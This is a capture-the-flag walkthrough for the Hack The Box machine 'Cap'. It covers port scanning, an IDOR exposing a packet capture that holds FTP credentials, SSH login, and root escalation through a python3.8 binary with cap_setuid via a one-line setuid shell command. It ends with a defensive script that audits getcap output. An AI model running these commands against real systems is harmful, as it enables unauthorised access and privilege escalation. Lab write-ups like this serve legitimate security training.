Cap

#easy #linux #idor #capabilities

https://app.hackthebox.com/machines/Cap

Enumeration

sudo nmap -p- -sS --open --min-rate 5000 -Pn -n -vv 10.10.10.245 -oA openPorts
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
cat openPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ','
nmap -p 21,22,80 -sCV -Pn 10.10.10.245 -oA targeted
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Wappalyzer

http://10.10.10.245/

IDOR


http://10.10.10.245/data/0

Click on Download

Open file 0.pcap with Wireshark

Filter

ftp.request.command == USER or ftp.request.command == PASS

USER: nathan PASSWORD: Bu***********3!

FTP

ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:kali): nathan
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||56796|)
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 Jun 18 16:09 snap
-r--------    1 1001     1001           33 Jun 18 16:06 user.txt
226 Directory send OK.
ftp> more user.txt
a36e************************b7c0

SSH

ssh nathan@10.10.10.245
nathan@cap:~$ ls
snap  user.txt
nathan@cap:~$ cat user.txt
a36e************************b7c0

Privilege Escalation

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

CAP_SETUID

CAP_SETUID/SETGID Capabilities

nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# cd /root
# ls
root.txt  snap
# cat root.txt
4288************************7036
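A defender-side audit for the capability finding above, added here and not part of the original writeup: it parses `getcap -r` output (the listing from this box, embedded as a constructed sample) and flags binaries whose permitted or effective set carries a root-equivalent capability such as cap_setuid. The `ROOT_EQUIVALENT` set, the function names and the regex are my own choices, not part of libcap.

```python
import re

# Capabilities a local user can convert into full root when granted to a
# binary that will run caller-controlled code (an interpreter, a shell, an
# editor). cap_net_raw and cap_net_bind_service, seen on ping and
# gst-ptp-helper above, are deliberately not in this set.
ROOT_EQUIVALENT = frozenset({
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_module", "cap_sys_ptrace", "cap_chown",
    "cap_fowner", "cap_setfcap",
})

# Matches both the classic libcap format ("path = caps+flags") and the newer
# one ("path caps=flags").
LINE_RE = re.compile(
    r"^(?P<path>\S+)(?:\s*=\s*|\s+)(?P<caps>[a-z0-9_,]+)[+=](?P<flags>[eip]+)\s*$"
)

# Constructed sample, in the same format as the getcap -r listing above.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""


def parse_getcap(text):
    """Yield (path, set_of_caps, flags) for each parsable line of getcap output."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["path"], set(m["caps"].split(",")), m["flags"]


def find_dangerous(text):
    """Return [(path, sorted root-equivalent caps, flags)] for binaries whose
    permitted or effective set contains a root-equivalent capability."""
    findings = []
    for path, caps, flags in parse_getcap(text):
        bad = sorted(caps & ROOT_EQUIVALENT)
        # 'p' alone is enough to report: a program can raise a permitted
        # capability into its effective set itself, so permitted-only is not safe.
        if bad and ("e" in flags or "p" in flags):
            findings.append((path, bad, flags))
    return findings


if __name__ == "__main__":
    for path, bad, flags in find_dangerous(SAMPLE_GETCAP):
        print(f"{path}: {','.join(bad)} ({flags})")
```

Run it against real output with `getcap -r / 2>/dev/null | python3 audit.py` after swapping `SAMPLE_GETCAP` for `sys.stdin.read()`; on this box it reports only `/usr/bin/python3.8`.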
